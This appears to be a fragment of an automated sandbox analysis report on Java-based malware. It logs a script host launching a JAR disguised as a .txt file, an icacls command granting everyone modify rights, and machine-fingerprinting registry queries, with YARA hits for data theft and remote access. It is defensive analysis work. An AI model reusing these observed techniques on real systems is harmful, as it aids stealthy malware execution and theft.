Source: javaw.exe, 00000001.00000002.2959890275.0000000000768000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Memory protected: page read and write | page guard
Source: C:\Windows\System32\wscript.exe Process created: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe "C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\user\AppData\Roaming\qkviumto.txt"
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 1_2_021403C0 cpuid 1_2_021403C0
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\JavaSoft\Java Runtime Environment CurrentVersion
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\JavaSoft\Java Runtime Environment CurrentVersion
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\java.dll VolumeInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\client\jvm.dll VolumeInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\java.dll VolumeInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\java.dll VolumeInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Queries volume information: C:\Users\user\AppData\Local\Temp\hsperfdata_user\7560 VolumeInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\resources.jar VolumeInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\meta-index VolumeInformation
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Queries volume information: C:\Users\user\7123lock.file VolumeInformation
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match File source: 00000001.00000002.2964017700.00000000099B3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.2964017700.0000000009768000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: javaw.exe PID: 7560, type: MEMORYSTR

Remote Access Functionality

Source: Yara match File source: 00000001.00000002.2964017700.00000000099B3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.2964017700.0000000009768000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: javaw.exe PID: 7560, type: MEMORYSTR